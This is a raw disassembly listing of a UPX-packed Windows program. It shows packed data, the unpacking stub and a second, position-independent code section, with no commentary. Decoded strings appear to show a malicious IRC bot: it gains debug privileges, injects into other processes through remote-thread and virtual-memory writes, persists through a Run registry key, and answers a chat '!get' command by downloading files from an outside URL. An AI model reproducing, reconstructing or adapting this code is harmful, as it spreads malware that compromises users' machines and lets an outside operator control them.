dd 2CE1FCB7h, 0FCF5CA01h, 0FCF25AFCh, 0FDBFFFE5h, 0F5FCF7EBh
dd 0C7D6ABAAh, 59AAF934h, 2A2A25B4h, 93ACC966h, 0BEB78190h
dd 90FF67F0h, 0C983639Dh, 309271CDh, 513519BFh, 0A95D914h
dd 0FFFF9172h, 712AEC20h, 0A5D2EBC8h, 0E180D512h, 6FAA529Ah
dd 9A2A8D14h, 46FEDFC8h, 8B12B9FBh, 0C3474A9Ah, 0DB9BAB9Eh
dd 0EC20A319h, 0FFDDA26Ch, 0BDFFFDBFh, 0DF9EED85h, 0EB81E8A2h
dd 0C8125544h, 2E961FBDh, 0D812EB8Dh, 125A9A85h, 0FF9A099Dh
dd 5ACD0B09h, 0D096F810h, 7F664922h, 8712FEFDh, 0BB6F6EDBh
dd 95C25AA9h, 82128502h, 0CB5A9104h, 0F9B9CFF7h, 857F4067h
dd 424D53FFh, 0C8531872h, 9CFF4BFh, 62FEFFh, 83435002h
dd 4F575445h, 0E35BED52h, 50204BFFh, 52474F52h, 31204D41h
dd 414C17CDh, 52024D4Eh, 0A6290EBh, 0B71566ABh, 0B75BB696h
dd 0BB676B03h, 330E7075h, 0B61F611Ah, 4D27EB74h, 21583223h
dd 2E323232h, 66D35831h, 2018D62Ah, 5A8B323Ch, 0A433C8C9h
dd 0EC1B0773h, 0C2285DBh, 40023FFh, 20140A11h, 8DDADE05h
dd 69A0D41Ah, 534B4C00h, 4915053h, 97B7887Fh, 4AE00882h
dd 0EDF81773h, 6E240057h, 6F006400h, 3A730075h, 5EDEC874h
dd 901306Ch, 3500398Ch, 0DCC06C23h, 72E1D96h, 32ABDA00h
dd 889CF20h, 3B57DA20h, 9F4C9383h, 46F20003h, 0C1901E23h
dd 40074706h, 0D1060006h, 1046E7FFh, 8A151F01h, 48E088h
dd 8144004Fh, 0FE1BFFFDh, 0F27A6A19h, 281C49E4h, 742530AFh
dd 0E1536710h, 137C853Ch, 3075DF5Ch, 0AEBD0400h, 75CB6B9h
dd 5C085ABDh, 72363761h, 72E4DD7h, 2E380036h, 3B1B3077h
dd 496D899Bh, 0E843EC00h, 0F9633F00h, 640E7900h, 4DC08A2h
dd 6DFF20F6h, 0FF1640h, 0E00DEDEh, 19F1600h, 9BF2602h
dd 28401213h, 0C1110319h, 8B7DC346h, 0D374D96Ch, 0BBE42970h
dd 9C2A9BACh, 0D81D256Bh, 109F6DB3h, 1B04480Eh, 5D6DCF54h
dd 5A5413D7h, 22596326h, 83CBC75Ch, 45B9FF34h, 58765h
dd 4810030Bh, 0C5FFFFB8h, 0EB810DEh, 286A050Bh, 0B10C3919h
dd 0A89B11D0h, 7D4FC000h, 0D9EC7FE1h, 5D5FF52Eh, 1CEB8A88h
dd 0E89F11C9h, 48102B3Ch, 0B22E7C60h, 0F40CD197h, 0CA060A3h
dd 95E43C80h, 0CB10CA0h, 32393BFEh, 880CA000h, 90040h
dd 847B03ECh, 7F927h, 4F401495h, 0BF40707Ch, 6C8A5ECh
dd 13430700h, 88FFC279h, 138578h, 0E9A65BABh, 18F81013h
dd 2FE409CFh, 230EFEFFh
dd 0D45830C1h, 8408BE40h, 7DD3E488h, 10B943D2h, 0B801FFEEh
dd 79366110h, 0AD200CF2h, 9F7F070Dh, 0FF215E5h, 700118D8h
dd 0F900F84h, 0F842579h, 4D000F95h, 206FC9Eh, 6C0F847Fh
dd 84AADE0Fh, 0A89A0087h, 93F436Fh, 1F13C88Ch, 50586E69h
dd 0C0A6DB20h, 7250CAh, 39014446h, 3C844FC9h, 123C6B32h
dd 7B027515h, 413C840Dh, 941C0053h, 1CAFFF01h, 0C606EB22h
dd 73255C5Ch, 6370695Ch, 9BFFF975h, 0EC816624h, 0E4FF071Ch
dd 44655300h, 67756265h, 0FA377669h, 67853518h, 6A6441A7h
dd 6F546175h, 0EC99B6E4h, 176E656Bh, 126F4C73h, 0BF6D7075h
dd 61569FDDh, 4165756Ch, 28704F17h, 7324636Fh, 8D48EA58h
dd 76430034h, 65333F61h, 0E33152A3h, 0F86D4C79h, 0F5056D1Bh
dd 545F1165h, 57796172h, 95D52DB5h, 31431735h, 52521A61h
dd 682DBB9Dh, 6854056Fh, 7356140Ch, 0A35B6B75h, 284158DBh
dd 0A578454Fh, 77336D67h, 47356E3Ah, 121EF3F5h, 48F46897h
dd 7F505454h, 5732203Ch, 0FDEF52B5h, 0D4B4F20h, 9F4B010Ah
dd 6ADF6644h, 4C2D02BBh, 3A2D6704h, 18752520h, 0CA587B5Ah
dd 7954282Fh, 0A66D26B5h, 70A3DAB6h, 15836386h, 8EA9EE2Fh
dd 2DC7025Ah, 42C97293h, 9F56B18Bh, 2B004757h, 0A35B47BAh
dd 0E564F6F4h, 42CB73CBh, 6D8D57FBh, 0A9637673h, 0DA6977CBh
dd 0F1538B77h, 175F3203h, 9A69E775h, 7B5E62Eh, 36373803h
dd 0A6BB2774h, 331F3435h, 32033369h, 0D34B75F2h, 13393031h
dd 0C8383F38h, 370D8320h, 20353607h, 34320C83h, 909A3233h
dd 3031C83Ah, 0F93AF378h, 0CC95ACFFh, 4F53BBD9h, 41575446h
dd 4D5C4552h, 62C1F869h, 6F736F7Bh, 5CBF5CD7h, 72727543h
dd 6B61BC22h, 73DC5615h, 75525C0Ah, 85B79F6Eh, 74231716h
dd 6824D26Fh, 0FF532030h, 1B6850A3h, 673BE3F7h, 7264736Eh
dd 1D93706Ah, 652B79B6h, 51530002h, 6612D86h, 6C0E5F06h
dd 5736264Dh, 5F664B68h, 60C14923h, 34421C28h, 68FF5455h
dd 130BC037h, 5E432053h, 0D5762067h, 0FB95B7B3h, 8058763Bh
dd 0C823B532h, 7C65B05Eh, 0FC471A1Bh, 23596E66h, 79931217h
dd 36346B73h, 4200707Eh, 61BF2063h, 0B7B5B623h, 6D1B1358h
dd 0DD975220h, 0B4B63772h, 0E0440300h, 2F660E20h, 0EE7B25B0h
dd 2AAC6D67h, 5B632463h, 22BFDAE4h, 20797469h, 1E6E614Dh
dd 0AC31B81Ah, 74201501h, 2A2AAE89h, 0FD92BBC4h, 0EC01388Ch
dd 65657246h, 0DBF0060Ch, 470DF923h, 6F4D7465h, 978A5F87h
dd 6B4665E2h, 686D614Eh, 74736C01h, 0C01AEF7Bh, 0A956372h
dd 79706F43h, 70A40A19h, 45A1816Fh, 4E326578h, 7C52FFF6h
dd 6C6F6F54h, 32337067h, 70616E53h, 746F6873h, 4DADDD19h
dd 32129C8Ah, 540F7372h, 14AD7305h, 182C358Fh, 80FB05B6h
dd 78654E21h, 41616974h, 215FFD54h, 0F76451Eh, 7469616Bh
dd 53726F46h, 0B6F6BA21h, 4F7B673Ch, 2C766A62h, 0D9B9E144h
dd 8D225AC3h, 3A0B6972h, 0BFBDEC97h, 486573C8h, 0C646E61h
dd 0C25E2447h, 8B6C3BDh, 5A61D26Eh, 0B5CDB3F0h, 0A3449711h
dd 14796456h, 0B6DF75BBh, 2B61984Ch, 6F666E49h, 6509530Fh
dd 37800670h, 9C496218h, 64656B26h, 64D98845h, 6EB328B3h
dd 92E7FB36h, 12E0D0CDh, 6464410Bh, 0F7B30F72h, 4C0B111Dh
dd 61726269h, 0E68AB567h, 4D2B60DAh, 36137C82h, 0D5CB080Bh
dd 0C363CF8Eh, 547B42DAh, 75888169h, 4915DE65h, 0E94D8AD8h
dd 1BDA3478h, 0DD29B36h, 0F239C45Dh, 4F116610h, 78455A62h
dd 0B3612DB6h, 630ADF31h, 9B9E6D13h, 522DC6E0h, 87B591Bh
dd 1766C0E0h, 38657A86h, 0A3604CA7h, 451585B5h, 0D160C3FCh
dd 33759F9Dh, 0A1673A2Bh, 4579654Bh, 0CE40EC3Bh, 0FC18610h
dd 5EC00A51h, 11F65AC2h, 5987309Eh, 21E7426Ch, 841CE010h
dd 0C517B76h, 0BE6E6241h, 0E2B6853h, 310428A5h, 1AC13F86h
dd 3677D985h, 62BB1089h, 440A7DB6h, 720E6112h, 0D61B6669h
dd 0CA79B63Ah, 2B758F67h, 616F6C36h, 6FCE436Fh, 6F112C79h
dd 67702350h, 0E8F5210h, 38F63F90h, 4114B4D0h, 69757163h
dd 74AE7072h, 35494DD8h, 0C3363AA0h, 0DE1359A7h, 0CA7273ECh
dd 18B16D06h, 35B2D1CEh, 150F920Eh, 536B99DAh, 445F1D4Dh
dd 740AC558h, 685F3FB8h, 3627F9F6h, 2CC46DBh, 4F727907h
dd 880110E9h, 9160AD15h, 1CC2D22h, 271DCD34h, 61150E65h
dd 14362CC2h, 0BBB4E70Ah, 4906EE15h, 70737766h, 4166B105h
dd 9C62834Fh, 424F466h, 0DB616C5Ah, 9B558543h, 370E1141h
dd 6705212Ch, 1B866B14h, 6E0306A6h, 74534349h, 8C950E81h
dd 0D471A65h, 0A8EDB2CBh, 273FFA1h, 2C010D02h, 392CB2CBh
dd 0C17346Fh, 0B2CB2CB2h, 10130409h, 4F45AA16h, 455036AAh
dd 0E4FFB60Eh, 59C896B7h, 0E00040D8h, 0B010F00h, 260C0601h
dd 68011CB2h, 2334DC12h, 0C6A32510h, 0B31420Eh, 0B7334A02h
dd 0C079BA4h, 39341E60h, 10B0364Bh, 2D570607h, 6210805Dh
dd 7C64098Ch, 0B0AE3145h, 6A2E1E01h, 0B60D8180h, 269024A6h
dd 7C7B64C4h, 0E0049F90h, 0FBE1642Eh, 0D85BA114h, 272A0737h
dd 48C016h, 81434BE0h, 54C32Fh, 2 dup(0)
db 90h
db 0FFh, 2 dup(0)
align 10h
pusha
mov esi, offset dword_31426000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31427BD2
; ---------------------------------------------------------------------------
align 8
loc_31427BC8: ; CODE XREF: UPX1:loc_31427BD9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_31427BCE: ; CODE XREF: UPX1:31427C66�j
; UPX1:31427C7D�j
add ebx, ebx
jnz short loc_31427BD9
loc_31427BD2: ; CODE XREF: UPX1:31427BC0�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427BD9: ; CODE XREF: UPX1:31427BD0�j
jb short loc_31427BC8
mov eax, 1
loc_31427BE0: ; CODE XREF: UPX1:31427BEF�j
; UPX1:31427BFA�j
add ebx, ebx
jnz short loc_31427BEB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427BEB: ; CODE XREF: UPX1:31427BE2�j
adc eax, eax
add ebx, ebx
jnb short loc_31427BE0
jnz short loc_31427BFC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31427BE0
loc_31427BFC: ; CODE XREF: UPX1:31427BF1�j
xor ecx, ecx
sub eax, 3
jb short loc_31427C10
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_31427C82
mov ebp, eax
loc_31427C10: ; CODE XREF: UPX1:31427C01�j
add ebx, ebx
jnz short loc_31427C1B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C1B: ; CODE XREF: UPX1:31427C12�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31427C28
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C28: ; CODE XREF: UPX1:31427C1F�j
adc ecx, ecx
jnz short loc_31427C4C
inc ecx
loc_31427C2D: ; CODE XREF: UPX1:31427C3C�j
; UPX1:31427C47�j
add ebx, ebx
jnz short loc_31427C38
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C38: ; CODE XREF: UPX1:31427C2F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_31427C2D
jnz short loc_31427C49
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31427C2D
loc_31427C49: ; CODE XREF: UPX1:31427C3E�j
add ecx, 2
loc_31427C4C: ; CODE XREF: UPX1:31427C2A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_31427C6C
loc_31427C5D: ; CODE XREF: UPX1:31427C64�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_31427C5D
jmp loc_31427BCE
; ---------------------------------------------------------------------------
align 4
loc_31427C6C: ; CODE XREF: UPX1:31427C5B�j
; UPX1:31427C79�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_31427C6C
add edi, ecx
jmp loc_31427BCE
; ---------------------------------------------------------------------------
loc_31427C82: ; CODE XREF: UPX1:31427C0C�j
pop esi
mov edi, esi
mov ecx, 7Eh
loc_31427C8A: ; CODE XREF: UPX1:31427C91�j
; UPX1:31427C96�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_31427C8F: ; CODE XREF: UPX1:31427CB4�j
cmp al, 1
ja short loc_31427C8A
cmp byte ptr [edi], 1
jnz short loc_31427C8A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_31427C8F
lea edi, [esi+5000h]
loc_31427CBC: ; CODE XREF: UPX1:31427CDE�j
mov eax, [edi]
or eax, eax
jz short loc_31427D07
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+708Ch]
xchg eax, ebp
loc_31427CD9: ; CODE XREF: UPX1:31427CFF�j
mov al, [edi]
inc edi
or al, al
jz short loc_31427CBC
mov ecx, edi
jns short near ptr loc_31427CEA+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_31427CEA: ; CODE XREF: UPX1:31427CE2�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+7090h]
or eax, eax
jz short loc_31427D01
mov [ebx], eax
add ebx, 4
jmp short loc_31427CD9
; ---------------------------------------------------------------------------
loc_31427D01: ; CODE XREF: UPX1:31427CF8�j
call dword ptr [esi+7094h]
loc_31427D07: ; CODE XREF: UPX1:31427CC0�j
popa
jmp loc_31422334
; ---------------------------------------------------------------------------
align 400h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00017000 ( 94208.)
; Section size in file : 00012600 ( 75264.)
; Offset to raw data for section: 00008000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31428000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 80C4h, 808Ch, 3 dup(0)
dd 80D1h, 809Ch, 3 dup(0)
dd 80DEh, 80A4h, 3 dup(0)
dd 80E9h, 80ACh, 3 dup(0)
dd 80F4h, 80B4h, 3 dup(0)
dd 8100h, 80BCh, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C371D3h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
dd 1C39068h, 0FFC48BEDh, 0E85B93D0h, 59h, 824648Bh, 4EBB8h
dd 64FAEB00h, 18A167h, 0F30408Bh, 830240B6h, 3C7500F8h
dd 0E8h, 0ED815D00h, 402334h, 237B858Bh, 85030040h, 402383h
dd 858BF08Bh, 40237Fh, 23838503h, 8B500040h, 0ACC933FEh
dd 238B8532h, 41AA0040h, 23878D3Bh, 0EF7C0040h, 64C02BC3h
dd 896430FFh, 5678B820h, 3871234h, 6000h, 7BB0h, 31420000h
dd 1E00h, 0E89078h, 8B000000h, 80F72404h, 242Bh, 80000000h
dd 29AC9889h, 5C8B0000h, 2D740424h, 0B08959FCh, 29B0h
dd 29B4B889h, 0B8800000h, 242Fh, 30D75E8h, 243098h, 25B8B00h
dd 8EB33FFh, 2431988Bh, 33FF0000h, 8195555Bh, 8F04246Ch
dd 81000000h, 0FFF000E3h, 6ED81FFh, 8B004010h, 8D04247Ch
dd 40343CB5h, 61B900h, 0A4F30000h, 544E7B81h, 75736968h
dd 3C438B0Dh, 6618048Dh, 45503881h, 0EB810874h, 100h, 508BE275h
dd 8BD30378h, 4A8B2072h, 51F30318h, 81C303ADh, 4700FF78h
dd 1B757465h, 50037881h, 75636F72h, 7788112h, 72646441h
dd 78810975h, 7373650Bh, 0E2057400h, 0C35D59D7h, 8B240C29h
dd 3592472h, 4B70FF3h, 1C7A8B4Eh, 348BFB03h, 0E8F30387h
dd 0Ch, 736F6C43h, 6E614865h, 656C64h, 89D6FF53h, 40353C85h
dd 0DE800h, 72430000h, 65746165h, 6E657645h, 53004174h
dd 8589D6FFh, 403540h, 0DE8h, 74654700h, 7473614Ch, 6F727245h
dd 0FF530072h, 448589D6h, 0E8004035h, 70h, 2174C085h, 4495FF50h
dd 85004035h, 8D1075C0h, 4011D285h, 0FF508A00h, 6EE8h
dd 0FF7CEB00h, 40353C95h, 3185F700h, 4034h, 74800000h
dd 35B58D1Eh, 8B004034h, 0A404247Ch, 0B29D8BA5h, 8B004039h
dd 4039B6B5h, 0BABD8B00h, 5D004039h, 6A5AC3h, 6A006Ah
dd 168006Ah, 8B000400h, 50006AC4h, 0C48B0C6Ah, 5456E2FFh
dd 335Fh, 0DAE8C933h, 8DFFFFFFh, 4011A195h, 51515200h
dd 4095FF50h, 83004035h, 8AC320C4h, 225FB9F2h, 10300000h
dd 0E2D60240h, 8328C3F9h, 401580A5h, 0A5830000h, 401584h
dd 88A58300h, 4015h, 3431858Bh, 0C9330040h, 20B1016Ah
dd 397E858Fh, 0D2330040h, 920FE8D1h, 3E2C0C2h, 397E9501h
dd 0EEE20040h, 385C657h, 1004013h, 3548B589h, 0B58D0040h
dd 4015BBh, 0BD8DC933h, 403558h, 5EE81EB1h, 5F000003h
dd 359495FFh, 0E8C10040h, 0D4840F1Fh, 8B000000h, 406A1447h
dd 68C303h, 89080010h, 40355085h, 69CE6800h, 6A0000h, 35C895FFh
dd 0C0850040h, 0FEF1840Fh, 8D97FFFFh, 401000B5h, 0B9EF8B00h
dd 0A74h, 1000ED81h, 958D0040h, 401283h, 0E2FFA5F3h, 8B20EC83h
dd 33086AFCh, 958D59C0h, 401A3Dh, 0FC8BABF3h, 0FE105789h
dd 68571C47h, 10003h, 355095FFh, 0C4830040h, 0FC08520h
dd 0FFFEA284h, 6A97FFh, 68016Ah, 68800004h, 10000h, 355095FFh
dd 0C0850040h, 0FE85840Fh, 6AFFFFh, 6850h, 6A0004h, 570CE8C1h
dd 6850016Ah, 10001h, 355095FFh, 0A680040h, 0FF000100h
dd 40355095h, 5E800h, 54E90000h, 6AFFFFFEh, 0AE35901h
dd 95FF0A6Ah, 4035BCh, 83C3F1EBh, 403570BDh, 840F0000h
dd 0FFFFFE37h, 6E8h, 44544E00h, 0FF004C4Ch, 40358895h
dd 73B58D00h, 33004017h, 0D0BD8DC9h, 0B1004035h, 46E8930Bh
dd 83000002h, 4035F8BDh, 840F0000h, 0FFFFFE03h, 35D4858Bh
dd 70FF0040h, 95858F01h, 8B004033h, 4035E885h, 170FF00h
dd 33E2858Fh, 858B0040h, 4035D8h, 8F0170FFh, 4033E985h
dd 0DC8D8B00h, 0E3004035h, 171FF09h, 33F6858Fh, 0F2E80040h
dd 8DFFFFFDh, 40364EBDh, 6ACF8B00h, 0FFD9F600h, 0E1830470h
dd 3406A03h, 6A57F9h, 0B58D186Ah, 40159Fh, 1CB9h, 8DD48B00h
dd 0FFFE4D04h, 0AB66FFFFh, 4D048Dh, 66000000h, 4478DABh
dd 0ACE432ABh, 0FBE2AB66h, 0CE68006Ah, 8B000069h, 8B006ACCh
dd 68006AC4h, 8000000h, 5251406Ah, 0FF500E6Ah, 4035E095h
dd 0C4835800h, 69CE6840h, 0D48B0000h, 0CC8B006Ah, 6A406Ah
dd 6A52026Ah, 69CE6800h, 6A0000h, 50FF6A51h, 35E495FFh
dd 595F0040h, 840FFF85h, 0FFFFFD27h, 1000B58Dh, 74B90040h
dd 8B00000Ah, 81A5F3EFh, 401000EDh, 4C858D00h, 0FF004014h
dd 0E0958DE0h, 52004018h, 359C95FFh, 16E80040h, 4C000000h
dd 756B6F6Fh, 69725070h, 656C6976h, 61566567h, 4165756Ch
dd 95FF5000h, 403548h, 354C8589h, 54500040h, 0FF6A206Ah
dd 35EC95FFh, 0C0850040h, 963F755Fh, 5656026Ah, 16AD48Bh
dd 11E852h, 65530000h, 75626544h, 69725067h, 656C6976h
dd 56006567h, 354C95FFh, 0C48B0040h, 50565656h, 95FF5756h
dd 4035D0h, 5710C483h, 353C95FFh, 6A0040h, 95FF026Ah, 403570h
dd 128B9h, 0E12B9700h, 54240C89h, 0AC95FF57h, 33004035h
dd 3CA583F6h, 4036h, 95FF5754h, 4035B0h, 5C74C085h, 4FE8346h
dd 74FFEE72h, 6A0824h, 95FF2A6Ah, 4035A8h, 0DC74C085h
dd 43DE893h, 0C9330000h, 3930E391h, 40363C85h, 81287500h
dd 0DAEC1h, 50545000h, 50505156h, 6895FF53h, 85004035h
dd 0F7459C0h, 82474FFh, 363C858Fh, 0ACE80040h, 53FFFFFDh
dd 353C95FFh, 98EB0040h, 128C481h, 0FF570000h, 40353C95h
dd 0FBE5E900h, 498DFFFFh, 58585800h, 29CE00h, 0D6500h
dd 3 dup(0)
dd 53565100h, 354895FFh, 59AB0040h, 75C084ACh, 0C3EEE2FBh
dd 7361425Ch, 6D614E65h, 624F6465h, 7463656Ah, 33575C73h
dd 69565F32h, 757472h, 7274736Ch, 6E656Ch, 61657243h, 69466574h
dd 41656Ch, 61657243h, 69466574h, 614D656Ch, 6E697070h
dd 43004167h, 74616572h, 6F725065h, 73736563h, 72430041h
dd 65746165h, 6F6D6552h, 68546574h, 64616572h, 65724300h
dd 54657461h, 61657268h, 72430064h, 65746165h, 6C6F6F54h
dd 706C6568h, 6E533233h, 68737061h, 4500746Fh, 54746978h
dd 61657268h, 69460064h, 6954656Ch, 6F54656Dh, 74737953h
dd 69546D65h, 4700656Dh, 69467465h, 7441656Ch, 62697274h
dd 73657475h, 65470041h, 6C694674h, 7A695365h, 65470065h
dd 6C694674h, 6D695465h, 65470065h, 646F4D74h, 48656C75h
dd 6C646E61h, 47004165h, 65547465h, 6946706Dh, 614E656Ch
dd 41656Dh, 54746547h, 50706D65h, 41687461h, 74654700h
dd 73726556h, 6E6F69h, 56746547h, 69737265h, 78456E6Fh
dd 6F4C0041h, 694C6461h, 72617262h, 4D004179h, 69567061h
dd 664F7765h, 656C6946h, 65704F00h, 6C69466Eh, 70614D65h
dd 676E6970h, 704F0041h, 72506E65h, 7365636Fh, 72500073h
dd 7365636Fh, 46323373h, 74737269h, 6F725000h, 73736563h
dd 654E3233h, 53007478h, 69467465h, 7441656Ch, 62697274h
dd 73657475h, 65530041h, 6C694674h, 6D695465h, 6C530065h
dd 706565h, 74737953h, 69546D65h, 6F54656Dh, 656C6946h
dd 656D6954h, 6D6E5500h, 69567061h, 664F7765h, 656C6946h
dd 72695600h, 6C617574h, 6F6C6C41h, 72570063h, 46657469h
dd 656C69h, 6441744Eh, 7473756Ah, 76697250h, 67656C69h
dd 6F547365h, 6E656Bh, 7243744Eh, 65746165h, 656C6946h
dd 43744E00h, 74616572h, 6F725065h, 73736563h, 43744E00h
dd 74616572h, 6F725065h, 73736563h, 4E007845h, 65724374h
dd 53657461h, 69746365h, 4E006E6Fh, 70614D74h, 77656956h
dd 6553664Fh, 6F697463h, 744E006Eh, 6E65704Fh, 656C6946h
dd 4F744E00h, 506E6570h, 65636F72h, 6F547373h, 6E656Bh
dd 7250744Eh, 6365746Fh, 72695674h, 6C617574h, 6F6D654Dh
dd 4E007972h, 69725774h, 69566574h, 61757472h, 6D654D6Ch
dd 79726Fh, 556C7452h, 6F63696Eh, 74536564h, 676E6972h
dd 6E416F54h, 74536973h, 676E6972h, 41535700h, 72617453h
dd 707574h, 736F6C63h, 636F7365h, 74656Bh, 6E6E6F63h, 746365h
dd 68746567h, 6274736Fh, 6D616E79h, 65720065h, 73007663h
dd 646E65h, 6B636F73h, 49007465h, 7265746Eh, 4374656Eh
dd 65736F6Ch, 646E6148h, 4900656Ch, 7265746Eh, 4774656Eh
dd 6F437465h, 63656E6Eh, 53646574h, 65746174h, 746E4900h
dd 656E7265h, 65704F74h, 4900416Eh, 7265746Eh, 4F74656Eh
dd 556E6570h, 416C72h, 65746E49h, 74656E72h, 64616552h
dd 656C6946h, 56444100h, 33495041h, 4C442E32h, 6552004Ch
dd 6F6C4367h, 654B6573h, 65520079h, 65704F67h, 79654B6Eh
dd 417845h, 51676552h, 79726575h, 756C6156h, 41784565h
dd 67655200h, 56746553h, 65756C61h, 417845h, 2B05E983h
dd 6851C8h, 8DE80000h, 6A03244Ch, 51056A00h, 56A5350h
dd 8B50CC8Bh, 6A5450D4h, 53525140h, 35F095FFh, 0C4830040h
dd 0F495FF0Ch, 83004035h, 57C308C4h, 15B1858Dh, 0FF330040h
dd 6A006A50h, 0A495FF0Eh, 85004035h, 90840FC0h, 50000000h
dd 69CE68h, 6AD48B00h, 6ACC8B00h, 6840h, 26A0010h, 68006A52h
dd 69CEh, 5351006Ah, 0E495FF50h, 5F004035h, 3C95FF59h
dd 85004035h, 8B5C74FFh, 4015888Dh, 8D0CE300h, 40100095h
dd 57D10300h, 8BD2FF53h, 4035D485h, 948F8D00h, 0E8000023h
dd 0FFFFFF54h, 35E8858Bh, 8F8D0040h, 23E1h, 0FFFF43E8h
dd 0D8858BFFh, 8D004035h, 23E88Fh, 0FF32E800h, 858BFFFFh
dd 4035DCh, 0B74C085h, 23F58F8Dh, 1DE80000h, 8BFFFFFFh
dd 55C35FC7h, 0E8h, 0ED815D00h, 401A14h, 858DC933h, 401DAEh
dd 51515451h, 0FF515150h, 40356C95h, 24048700h, 353C95FFh
dd 0C25D0040h, 0E8550004h, 0
dd 43ED815Dh, 6A00401Ah, 0E958DFFh, 5000401Ah, 2420CD52h
dd 83002A00h, 0C7660CC4h, 401A5485h, 0C720CD00h, 401A5685h
dd 2A002400h, 6AC35D00h, 0FF016A01h, 473FF33h, 0C08515FFh
dd 0B68F074h, 8B000000h, 50035BD0h, 72B58D3Ch, 8B00401Ah
dd 10CBAh, 88A8B00h, 3000001h, 60CB2BF8h, 0A6F3CB8Bh, 47057461h
dd 0C2EBF5E2h, 570FC783h, 8B53D48Bh, 6A5450CCh, 6A525140h
dd 0F095FFFFh, 83004035h, 958B0CC4h, 403574h, 0EA83D72Bh
dd 6A07C707h, 8900E800h, 6AC30357h, 9E8581Ah, 8D000000h
dd 0FEAA6142h, 0C3F075C9h
; =============== S U B R O U T I N E =======================================
sub_31428D78 proc near ; CODE XREF: sub_314295E3+1B�p
; sub_3142975B+3�p ...
imul edx, [ebp+403646h], 8088405h
inc edx
mov [ebp+403646h], edx
mul edx
retn
sub_31428D78 endp
; ---------------------------------------------------------------------------
dd 0E855h, 815D0000h, 401B09EDh, 4A9D8B00h, 83004036h
dd 8247Ch, 0B9840Fh, 0EC810000h, 208h, 1046854h, 95FF0000h
dd 403590h, 848DFC8Bh, 10424h, 6A5000h, 4E8h, 54525600h
dd 95FF5700h, 40358Ch, 978DC933h, 104h, 26A5151h, 68016A51h
dd 40000000h, 5C95FF52h, 96004035h, 5B74F685h, 4685450h
dd 57000001h, 2024B4FFh, 0FF000002h, 40362895h, 0C0855900h
dd 14E31674h, 6AD48B50h, 57515200h, 0CC95FF56h, 59004035h
dd 0D075C085h, 3C95FF56h, 8D004035h, 57524457h, 8D58446Ah
dd 10497h, 0C033AB00h, 0F359106Ah, 505050ABh, 50505050h
dd 6495FF52h, 81004035h, 208C4h, 2474FF00h, 1895FF08h
dd 53004036h, 361895FFh, 0C25D0040h, 3E800004h, 4601750Ah
dd 15848D8Bh, 19E30040h, 1000958Dh, 0D1030040h, 84D2FF56h
dd 1F880FC0h, 0F000001h, 11084h, 3A3E8000h, 80461075h
dd 840F003Eh, 101h, 75203E80h, 3E8146F1h, 474E4950h, 0CF8B4275h
dd 4F0146C6h, 6A51CE2Bh, 53565100h, 361095FFh, 3B590040h
dd 0DF850FC1h, 8D000000h, 401DA285h, 68006A00h, 0Ch, 95FF5350h
dd 403610h, 0C3Dh, 0BF850F00h, 0E9000000h, 0B1h, 52503E81h
dd 850F5649h, 0A5h, 0AC08C683h, 840F0D3Ch, 99h, 0F375203Ch
dd 0F3A3CACh, 8C85h, 200DAD00h, 3D202020h, 74656721h, 3CAC7F75h
dd 817C7520h, 6820FF7Eh, 71757474h, 70037E81h, 752F2F3Ah
dd 0FF47C668h, 0BA310F00h, 2710h, 0FF52E2F7h, 4035BC95h
dd 50C03300h, 0E8505050h, 9, 6E776F44h, 64616F6Ch, 2095FF00h
dd 85004036h, 333674C0h, 4A8589C9h, 51004036h, 20068h
dd 56515180h, 2495FF50h, 8D004036h, 401B0395h, 0C9335000h
dd 52505154h, 95FF5151h, 40356Ch, 0FF240487h, 40353C95h
dd 80C3F800h, 4015778Dh, 0C3F90100h
